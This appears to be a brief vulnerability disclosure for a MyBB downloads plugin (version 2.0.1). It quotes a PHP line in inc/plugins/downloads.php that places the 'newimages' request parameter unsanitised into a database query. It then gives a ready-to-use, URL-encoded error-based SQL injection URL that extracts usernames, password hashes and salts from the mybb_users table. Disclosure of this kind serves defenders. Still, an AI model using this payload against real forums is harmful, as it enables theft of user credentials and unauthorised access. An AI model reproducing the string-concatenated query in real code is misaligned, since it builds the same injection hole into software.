# Version: 2.0.1


Introduction
------------

Help in downloading files for MyBB forums.

SQL injection
-------------

inc/plugins/downloads.php L.30
[code=php]$qdownloads = $db->simple_select('downloads', '*', 'did="'.$mybb->input['newimages'].'"');[/code]


Proof of concept
----------------

error based injection: http://[site]/downloads.php?newimages=1%22%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28select%20concat%28username,%200x3a,%20password,%200x3a,%20salt,%200x3a%29%20from%20mybb_users%20limit%201%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--%20-